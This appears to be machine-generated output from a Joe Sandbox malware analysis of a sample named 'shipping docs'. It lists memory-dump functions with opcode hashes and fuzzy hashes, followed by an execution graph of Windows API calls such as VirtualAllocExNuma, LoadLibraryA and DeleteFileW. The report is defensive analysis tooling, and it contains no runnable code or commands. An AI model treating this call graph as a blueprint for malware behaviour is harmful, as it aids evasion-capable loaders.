                                                                                              • Snapshot File: hcaresult_0_2_97d000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 83a6230256b990637c6ab5eae2b70f0873b653dda3a7fed790a8d57a9f2c4d5c
                                                                                              • Instruction ID: 47387fc64bd6faefdef791794669dbd8dad3651594b5f30f66f4f6a58b42ecba
                                                                                              • Opcode Fuzzy Hash: 83a6230256b990637c6ab5eae2b70f0873b653dda3a7fed790a8d57a9f2c4d5c
                                                                                              • Instruction Fuzzy Hash: 172125B2504240DFDB11CF14D9C0B26BF75FF88328F24C569E90A4B25AC33AE846CBA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0098D01C Relevance: .1, Instructions: 72COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.265096750.000000000098D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0098D000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_98d000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: ef17f38896539ec513df289934042c5f27a7e8f2445f6d2193a262cd55adbc8d
                                                                                              • Instruction ID: c6d9bbb640d135a73192b7e0147dd8abc3f93bceb5f1448125d11abf2d16511b
                                                                                              • Opcode Fuzzy Hash: ef17f38896539ec513df289934042c5f27a7e8f2445f6d2193a262cd55adbc8d
                                                                                              • Instruction Fuzzy Hash: 212107B1504244DFDB14EF14D8C4B26BB65FB84314F24C96DD9494B386C33AD847CB61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0098D1D4 Relevance: .1, Instructions: 72COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.265096750.000000000098D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0098D000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_98d000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6fe28c06e5b7ed72ed9658356b425f56744e9832150547138cc9ccaf21feb88a
                                                                                              • Instruction ID: 14dbff1d11c0c1a824b7d5b8380cd9735409f3e0b6f72e7d0e461efa4939a038
                                                                                              • Opcode Fuzzy Hash: 6fe28c06e5b7ed72ed9658356b425f56744e9832150547138cc9ccaf21feb88a
                                                                                              • Instruction Fuzzy Hash: 4B21F5B1504244DFDB05EF14D5C0F26BBA5FB84314F24CA69D9494B386C33AD846CB61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0098D006 Relevance: .1, Instructions: 62COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.265096750.000000000098D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0098D000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_98d000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9ced31335bd9abff96b7d13da3f9dce7e6510f4b78d06b3c37d8fd68161457a3
                                                                                              • Instruction ID: f2cd306d56b3b4b82b16ceec75cacfb3ab1e4bd43475ada7fd8cada18ff943aa
                                                                                              • Opcode Fuzzy Hash: 9ced31335bd9abff96b7d13da3f9dce7e6510f4b78d06b3c37d8fd68161457a3
                                                                                              • Instruction Fuzzy Hash: CE2180755093C08FDB12CF20D994715BF71EB46314F28C5DAD8498B697C33A980ACB62
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0097D49B Relevance: .1, Instructions: 56COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.265063261.000000000097D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0097D000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_97d000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a4ebfea70809b752dd87daf1091c6fefd11053e22c75fac3715a094701740d1c
                                                                                              • Instruction ID: af373f5cd5ab9dd84192936ee150da74f57e99731d9bba4ffeeb2d968ecaa27e
                                                                                              • Opcode Fuzzy Hash: a4ebfea70809b752dd87daf1091c6fefd11053e22c75fac3715a094701740d1c
                                                                                              • Instruction Fuzzy Hash: 5C11B1B6804280CFDB12CF14D5C4B56BF72FF84324F24C6A9E8094B65AC336D856CBA2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0098D1CF Relevance: .1, Instructions: 53COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.265096750.000000000098D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0098D000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_98d000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 918b5a484225ea750dc867420c5dc02e162b71f4ae55fd38ff69526cb1fe86f3
                                                                                              • Instruction ID: 51a15ab84c3736e04c439dbb2fb0b0c054e7447292ad38d9687518b2923fe721
                                                                                              • Opcode Fuzzy Hash: 918b5a484225ea750dc867420c5dc02e162b71f4ae55fd38ff69526cb1fe86f3
                                                                                              • Instruction Fuzzy Hash: 5F118B75904280DFDB11DF14D5C4B15BBB1FB84324F28C6AAD8494B796C33AD84ACB61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0097D745 Relevance: .0, Instructions: 45COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.265063261.000000000097D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0097D000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_97d000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 13790c96f0af6ff542d40f08f18bda87fbe6c69a1aa4bb84d3791d4e5d14810b
                                                                                              • Instruction ID: 8ce8536ae927f289b37e23b565fb4879a1ae8aad041c80c69fb5ea0f9732ef98
                                                                                              • Opcode Fuzzy Hash: 13790c96f0af6ff542d40f08f18bda87fbe6c69a1aa4bb84d3791d4e5d14810b
                                                                                              • Instruction Fuzzy Hash: 0401F7B20093849AE7184A15CC84B66BBACEF81378F18C55AED0C4A246D3789C44C6B1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0097D744 Relevance: .0, Instructions: 36COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.265063261.000000000097D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0097D000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_97d000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 332b60ac8ce794aeb85ccfb7b2b9f72d3f64a2105ee73b5108fb141b59dd9f94
                                                                                              • Instruction ID: 52d3d717f6b7cfa3438a4054371f641df5cab8b961c12bc2c8287d1f6372d4a6
                                                                                              • Opcode Fuzzy Hash: 332b60ac8ce794aeb85ccfb7b2b9f72d3f64a2105ee73b5108fb141b59dd9f94
                                                                                              • Instruction Fuzzy Hash: D9F062724053449AE7148E1ACCC8B62FBACEF91774F18C45AED485B286C3799C44CAB1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Non-executed Functions

                                                                                              Function 04486628 Relevance: .4, Instructions: 361COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.277251037.0000000004480000.00000040.00000800.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4480000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 5c7a06c931d24b077eb5b669b4316bb643e41e57859468b6f6635b2d28c7dd04
                                                                                              • Instruction ID: 7597f4c4299fad229176d9ff58176462413932a3f45e168e1dbf88fe1ebb8cb6
                                                                                              • Opcode Fuzzy Hash: 5c7a06c931d24b077eb5b669b4316bb643e41e57859468b6f6635b2d28c7dd04
                                                                                              • Instruction Fuzzy Hash: 93D1BA70B016048FEB69EB76C450B6FB7E6AF89700F1184AED14A9B391DF35E901CB61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00B7E2D8 Relevance: .3, Instructions: 315COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.265338722.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_b70000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c695e56b5055ff758dfaad9a1b9897173edf66ba25dce41f327ee05d76ce951d
                                                                                              • Instruction ID: 7a32afc674ad18936905afea8e199a3b8084dd0178397686e1829721a9efa239
                                                                                              • Opcode Fuzzy Hash: c695e56b5055ff758dfaad9a1b9897173edf66ba25dce41f327ee05d76ce951d
                                                                                              • Instruction Fuzzy Hash: C612A6F1429F86CBD310CF65EDD82893BA1B74432CB964328D2615EAF1D7B8194AEF44
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04485C18 Relevance: .3, Instructions: 298COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.277251037.0000000004480000.00000040.00000800.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4480000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 5d24eb1ec0ef08d583f37e2b7c83adfad7bf85c971d468394c08d47729abb582
                                                                                              • Instruction ID: 3c00474925da7ea638b70338ee267a4f5b3a4f633c221f7189c06955fd6c0c7a
                                                                                              • Opcode Fuzzy Hash: 5d24eb1ec0ef08d583f37e2b7c83adfad7bf85c971d468394c08d47729abb582
                                                                                              • Instruction Fuzzy Hash: 86D1B134A006048FDB18EF69C598AADB7F1BF8D705F6580A9E509EB361DB31AD41CF50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00B7BFC4 Relevance: .3, Instructions: 265COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.265338722.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_b70000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e874add4d60e2d25b6b08c043c0847723070bfcb6fbe9988bf7cb67eaffa2a49
                                                                                              • Instruction ID: 92ca886b21db55bcf9da4c95927f8426a25656426ec5bdd1b8db9b17ba0e817c
                                                                                              • Opcode Fuzzy Hash: e874add4d60e2d25b6b08c043c0847723070bfcb6fbe9988bf7cb67eaffa2a49
                                                                                              • Instruction Fuzzy Hash: 89A13E36E10219CFCF19DFA5C84459EBBF2FF85300B1585AAE919AB221DB71AD45CB80
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00B7E2C8 Relevance: .2, Instructions: 225COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.265338722.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_b70000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 478209200483a2b9a7ea035c9672e672d3c92243c99151caa1c175313212dfde
                                                                                              • Instruction ID: 9571967bbab5570744aedf9dda2d857133f7f6b585b81ba9ac05801d9325f4b5
                                                                                              • Opcode Fuzzy Hash: 478209200483a2b9a7ea035c9672e672d3c92243c99151caa1c175313212dfde
                                                                                              • Instruction Fuzzy Hash: EDC11DB1429B86CBD710CF65EDC81893BA1BB4532CF964328D2616F6F1D7B41846EF44
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 044810A1 Relevance: .2, Instructions: 195COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.277251037.0000000004480000.00000040.00000800.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4480000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 35869a857c042985c89405a99581fe5540cfee0e559c0cabc6647e708c92c3e4
                                                                                              • Instruction ID: 5db8bc94ba079513f7dad7407a0f2f70add202cc3e00ed368cd3754b8633082f
                                                                                              • Opcode Fuzzy Hash: 35869a857c042985c89405a99581fe5540cfee0e559c0cabc6647e708c92c3e4
                                                                                              • Instruction Fuzzy Hash: D281FA74E0525ACF8F04DFA9D8415AEFBB1EF89200F10942BD816B7754E734AA028F94
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 044810B0 Relevance: .2, Instructions: 195COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.277251037.0000000004480000.00000040.00000800.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4480000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: f136d4999d61724f3a2468f980d548d5451190a72fc6e1e01f966c81ea501c2d
                                                                                              • Instruction ID: 865c0aa1676e4eb36f9b0bfc227bdc0536a91208c663a4a9abba4f6cdca6d8e0
                                                                                              • Opcode Fuzzy Hash: f136d4999d61724f3a2468f980d548d5451190a72fc6e1e01f966c81ea501c2d
                                                                                              • Instruction Fuzzy Hash: DB810B74E0925ACF8F04DFEAD9415AEFBB1EF89210F10942BD416B7754E734AA028F94
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04480800 Relevance: .2, Instructions: 194COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.277251037.0000000004480000.00000040.00000800.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4480000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 53c600677e941dc348f7d00120b2ffa7eb05528a877832cf6fc3001752ec8098
                                                                                              • Instruction ID: 0709ffe59d0f6984cbc1b681042260354ea8e4a5dede905d2fdea8784ca0bbb2
                                                                                              • Opcode Fuzzy Hash: 53c600677e941dc348f7d00120b2ffa7eb05528a877832cf6fc3001752ec8098
                                                                                              • Instruction Fuzzy Hash: 8E813D70E141299BDB14DFA9C9809AEFBF3BF89305F25C56AD408A7256D730AD41CFA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04480810 Relevance: .2, Instructions: 194COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.277251037.0000000004480000.00000040.00000800.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4480000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 5f460cfe460b229069e0b6546be63ab0d507291dce60635618bddc33d7044ac6
                                                                                              • Instruction ID: 61c8d3a86a696fa8d237483ab1fbd84c35d500edebe961c031f55712907ce841
                                                                                              • Opcode Fuzzy Hash: 5f460cfe460b229069e0b6546be63ab0d507291dce60635618bddc33d7044ac6
                                                                                              • Instruction Fuzzy Hash: 9B813A70E141298BDB14DFA9C9809AEFBF3BF89305F25C56AD408A7216D730AD41CFA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04481668 Relevance: .2, Instructions: 167COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.277251037.0000000004480000.00000040.00000800.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4480000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 1975377916467044a0ab68e0569bdf281ab8e24621ab82e97d891dd6ec2836f8
                                                                                              • Instruction ID: 2ab0e87e5fa7539d9e9d52ed3a3cee8434f00f89581c0f1519dbe38411a313c6
                                                                                              • Opcode Fuzzy Hash: 1975377916467044a0ab68e0569bdf281ab8e24621ab82e97d891dd6ec2836f8
                                                                                              • Instruction Fuzzy Hash: D9712B71E0162ACBDB64DF66D94479DB7B2FF99300F1082EAD50DA7210EB706A81DF40
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04481658 Relevance: .1, Instructions: 140COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.277251037.0000000004480000.00000040.00000800.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4480000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 8d3dbc25e7cbc489dbe8676a5e949f494f688d03495f8be3ae7ea7fb0378a316
                                                                                              • Instruction ID: fd28fb781482cde539e2c18b9308e161f99b9407ac30b38c74ca2be933f0f72b
                                                                                              • Opcode Fuzzy Hash: 8d3dbc25e7cbc489dbe8676a5e949f494f688d03495f8be3ae7ea7fb0378a316
                                                                                              • Instruction Fuzzy Hash: 83614E71E0161ACBDB24DF66D984799BBB2FF99300F1486EAD509A7210EB705EC1DF40
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Execution Graph

                                                                                              Execution Coverage:19.7%
                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                              Signature Coverage:0.6%
                                                                                              Total number of Nodes:802
                                                                                              Total number of Limit Nodes:28
                                                                                              execution_graph 50169 66ffb48 DuplicateHandle 50170 66ffbde 50169->50170 50171 2dfbb58 50172 2dfbb76 50171->50172 50175 2dfb734 50172->50175 50174 2dfbbad 50176 2dfd678 LoadLibraryA 50175->50176 50178 2dfd754 50176->50178 50190 2df0448 50191 2df0455 50190->50191 50194 2df0877 50191->50194 50192 2df045b 50195 2df0893 50194->50195 50196 2df0979 50195->50196 50197 2df0a53 VirtualAllocExNuma 50195->50197 50204 61f64a9 50195->50204 50212 61f64b8 50195->50212 50220 2df26b8 50195->50220 50223 2df26a8 50195->50223 50196->50192 50199 2df0b15 50197->50199 50199->50192 50205 61f64d1 50204->50205 50206 61f6927 50205->50206 50226 61f8ff8 50205->50226 50266 61f9040 50205->50266 50306 61f6f88 50205->50306 50312 61f7139 50205->50312 50318 61f70fa 50205->50318 50206->50195 50213 61f64d1 50212->50213 50214 61f6927 50213->50214 50215 61f70fa 3 API calls 50213->50215 50216 61f7139 3 API calls 50213->50216 50217 61f6f88 3 API calls 50213->50217 50218 61f8ff8 29 API calls 50213->50218 50219 61f9040 29 API calls 50213->50219 50214->50195 50215->50213 50216->50213 50217->50213 50218->50213 50219->50213 50983 2df2bf1 50220->50983 50221 2df26c3 50221->50195 50224 2df26c3 50223->50224 50225 2df2bf1 3 API calls 50223->50225 50224->50195 50225->50224 50228 61f8ffd 50226->50228 50227 61f90fc 50227->50205 50228->50227 50324 61f9fb6 50228->50324 50339 61fa037 50228->50339 50352 61f9cbb 50228->50352 50369 61fa4bd 50228->50369 50376 61f9d00 50228->50376 50393 61fa505 50228->50393 50400 61fa106 50228->50400 50409 61f9c10 50228->50409 50426 61fa190 50228->50426 50433 61fa21a 50228->50433 50440 61fa29b 50228->50440 50447 61fa31c 50228->50447 50454 61fa2e0 50228->50454 50461 61fa361 50228->50461 50468 61f9e66 50228->50468 50483 61f9ef0 50228->50483 50498 61f9f71 50228->50498 50513 61fa3f1 50228->50513 50520 61fa475 50228->50520 50527 61f9c76 50228->50527 50544 61f9ffb 50228->50544 50559 61fa07c 50228->50559 50572 61fa0c1 50228->50572 50583 61f92c9 50228->50583 50588 61fa14b 50228->50588 50595 61fa1d5 50228->50595 50602 61fa256 50228->50602 50609 61f92d8 50228->50609 50614 61f9d5b 50228->50614 50629 61f9ddc 50228->50629 50644 61f9da0 50228->50644 50659 61f9e21 50228->50659 50674 61fa3a9 50228->50674 50681 61f9eab 50228->50681 50696 61fa42d 50228->50696 50703 61f9c31 50228->50703 50720 61f9f35 50228->50720 50267 61f9048 50266->50267 50268 61f90fc 50267->50268 50269 61fa31c 3 API calls 50267->50269 50270 61fa29b 3 API calls 50267->50270 50271 61fa21a 3 API calls 50267->50271 50272 61fa190 3 API calls 50267->50272 50273 61f9c10 8 API calls 50267->50273 50274 61fa106 5 API calls 50267->50274 50275 61fa505 3 API calls 50267->50275 50276 61f9d00 8 API calls 50267->50276 50277 61fa4bd 3 API calls 50267->50277 50278 61f9cbb 8 API calls 50267->50278 50279 61fa037 6 API calls 50267->50279 50280 61f9fb6 7 API calls 50267->50280 50281 61f9f35 7 API calls 50267->50281 50282 61f9c31 8 API calls 50267->50282 50283 61fa42d 3 API calls 50267->50283 50284 61f9eab 7 API calls 50267->50284 50285 61fa3a9 3 API calls 50267->50285 50286 61f9e21 7 API calls 50267->50286 50287 61f9da0 7 API calls 50267->50287 50288 61f9ddc 7 API calls 50267->50288 50289 61f9d5b 7 API calls 50267->50289 50290 61f92d8 3 API calls 50267->50290 50291 61fa256 3 API calls 50267->50291 50292 61fa1d5 3 API calls 50267->50292 50293 61fa14b 3 API calls 50267->50293 50294 61f92c9 3 API calls 50267->50294 50295 61fa0c1 5 API calls 50267->50295 50296 61fa07c 6 API calls 50267->50296 50297 61f9ffb 7 API calls 50267->50297 50298 61f9c76 8 API calls 50267->50298 50299 61fa475 3 API calls 50267->50299 50300 61fa3f1 3 API calls 50267->50300 50301 61f9f71 7 API calls 50267->50301 50302 61f9ef0 7 API calls 50267->50302 50303 61f9e66 7 API calls 50267->50303 50304 61fa361 3 API calls 50267->50304 50305 61fa2e0 3 API calls 50267->50305 50268->50205 50269->50267 50270->50267 50271->50267 50272->50267 50273->50267 50274->50267 50275->50267 50276->50267 50277->50267 50278->50267 50279->50267 50280->50267 50281->50267 50282->50267 50283->50267 50284->50267 50285->50267 50286->50267 50287->50267 50288->50267 50289->50267 50290->50267 50291->50267 50292->50267 50293->50267 50294->50267 50295->50267 50296->50267 50297->50267 50298->50267 50299->50267 50300->50267 50301->50267 50302->50267 50303->50267 50304->50267 50305->50267 50308 61f6f95 50306->50308 50307 61f7258 50307->50205 50308->50307 50311 61f7e40 3 API calls 50308->50311 50949 61f7e1a 50308->50949 50956 61f8468 50308->50956 50311->50307 50314 61f7140 50312->50314 50313 61f7258 50313->50205 50315 61f7e1a 3 API calls 50314->50315 50316 61f8468 DeleteFileW 50314->50316 50317 61f7e40 3 API calls 50314->50317 50315->50313 50316->50313 50317->50313 50320 61f7101 50318->50320 50319 61f7258 50319->50205 50321 61f7e1a 3 API calls 50320->50321 50322 61f8468 DeleteFileW 50320->50322 50323 61f7e40 3 API calls 50320->50323 50321->50319 50322->50319 50323->50319 50325 61f9fc7 50324->50325 50735 684da38 50325->50735 50328 61fa0bf 50740 684e9d8 50328->50740 50330 61fa130 50749 66f6c78 50330->50749 50756 66f6f10 50330->50756 50763 66f6f64 50330->50763 50770 66f6b36 50330->50770 50331 61fa532 50331->50228 50340 61fa048 KiUserExceptionDispatcher 50339->50340 50342 61fa0bf 50340->50342 50346 684e9d8 2 API calls 50342->50346 50343 61fa0eb 50347 684f240 2 API calls 50343->50347 50344 61fa130 50348 66f6c78 3 API calls 50344->50348 50349 66f6b36 3 API calls 50344->50349 50350 66f6f64 3 API calls 50344->50350 50351 66f6f10 3 API calls 50344->50351 50345 61fa532 50345->50228 50346->50343 50347->50344 50348->50345 50349->50345 50350->50345 50351->50345 50353 61f9ccc 50352->50353 50354 61f9d24 KiUserExceptionDispatcher 50353->50354 50355 61f9d40 50354->50355 50362 684da38 LdrInitializeThunk 50355->50362 50356 61fa01c KiUserExceptionDispatcher 50358 61fa0bf 50356->50358 50363 684e9d8 2 API calls 50358->50363 50359 61fa0eb 50364 684f240 2 API calls 50359->50364 50360 61fa130 50365 66f6c78 3 API calls 50360->50365 50366 66f6b36 3 API calls 50360->50366 50367 66f6f64 3 API calls 50360->50367 50368 66f6f10 3 API calls 50360->50368 50361 61fa532 50361->50228 50362->50356 50363->50359 50364->50360 50365->50361 50366->50361 50367->50361 50368->50361 50370 61fa4ce 50369->50370 50372 66f6c78 3 API calls 50370->50372 50373 66f6b36 3 API calls 50370->50373 50374 66f6f64 3 API calls 50370->50374 50375 66f6f10 3 API calls 50370->50375 50371 61fa532 50371->50228 50372->50371 50373->50371 50374->50371 50375->50371 50377 61f9d11 KiUserExceptionDispatcher 50376->50377 50379 61f9d40 50377->50379 50386 684da38 LdrInitializeThunk 50379->50386 50380 61fa01c KiUserExceptionDispatcher 50382 61fa0bf 50380->50382 50387 684e9d8 2 API calls 50382->50387 50383 61fa0eb 50388 684f240 2 API calls 50383->50388 50384 61fa130 50389 66f6c78 3 API calls 50384->50389 50390 66f6b36 3 API calls 50384->50390 50391 66f6f64 3 API calls 50384->50391 50392 66f6f10 3 API calls 50384->50392 50385 61fa532 50385->50228 50386->50380 50387->50383 50388->50384 50389->50385 50390->50385 50391->50385 50392->50385 50394 61fa516 50393->50394 50396 66f6c78 3 API calls 50394->50396 50397 66f6b36 3 API calls 50394->50397 50398 66f6f64 3 API calls 50394->50398 50399 66f6f10 3 API calls 50394->50399 50395 61fa532 50395->50228 50396->50395 50397->50395 50398->50395 50399->50395 50401 61fa117 50400->50401 50404 684f240 2 API calls 50401->50404 50402 61fa130 50405 66f6c78 3 API calls 50402->50405 50406 66f6b36 3 API calls 50402->50406 50407 66f6f64 3 API calls 50402->50407 50408 66f6f10 3 API calls 50402->50408 50403 61fa532 50403->50228 50404->50402 50405->50403 50406->50403 50407->50403 50408->50403 50410 61f9c16 50409->50410 50411 61f9d24 KiUserExceptionDispatcher 50410->50411 50412 61f9d40 50411->50412 50424 684da38 LdrInitializeThunk 50412->50424 50413 61fa01c KiUserExceptionDispatcher 50415 61fa0bf 50413->50415 50425 684e9d8 2 API calls 50415->50425 50416 61fa0eb 50419 684f240 2 API calls 50416->50419 50417 61fa130 50420 66f6c78 3 API calls 50417->50420 50421 66f6b36 3 API calls 50417->50421 50422 66f6f64 3 API calls 50417->50422 50423 66f6f10 3 API calls 50417->50423 50418 61fa532 50418->50228 50419->50417 50420->50418 50421->50418 50422->50418 50423->50418 50424->50413 50425->50416 50427 61fa1a1 50426->50427 50429 66f6c78 3 API calls 50427->50429 50430 66f6b36 3 API calls 50427->50430 50431 66f6f64 3 API calls 50427->50431 50432 66f6f10 3 API calls 50427->50432 50428 61fa532 50428->50228 50429->50428 50430->50428 50431->50428 50432->50428 50434 61fa22b 50433->50434 50436 66f6c78 3 API calls 50434->50436 50437 66f6b36 3 API calls 50434->50437 50438 66f6f64 3 API calls 50434->50438 50439 66f6f10 3 API calls 50434->50439 50435 61fa532 50435->50228 50436->50435 50437->50435 50438->50435 50439->50435 50441 61fa2ac 50440->50441 50443 66f6c78 3 API calls 50441->50443 50444 66f6b36 3 API calls 50441->50444 50445 66f6f64 3 API calls 50441->50445 50446 66f6f10 3 API calls 50441->50446 50442 61fa532 50442->50228 50443->50442 50444->50442 50445->50442 50446->50442 50448 61fa32d 50447->50448 50450 66f6c78 3 API calls 50448->50450 50451 66f6b36 3 API calls 50448->50451 50452 66f6f64 3 API calls 50448->50452 50453 66f6f10 3 API calls 50448->50453 50449 61fa532 50449->50228 50450->50449 50451->50449 50452->50449 50453->50449 50455 61fa2f1 50454->50455 50457 66f6c78 3 API calls 50455->50457 50458 66f6b36 3 API calls 50455->50458 50459 66f6f64 3 API calls 50455->50459 50460 66f6f10 3 API calls 50455->50460 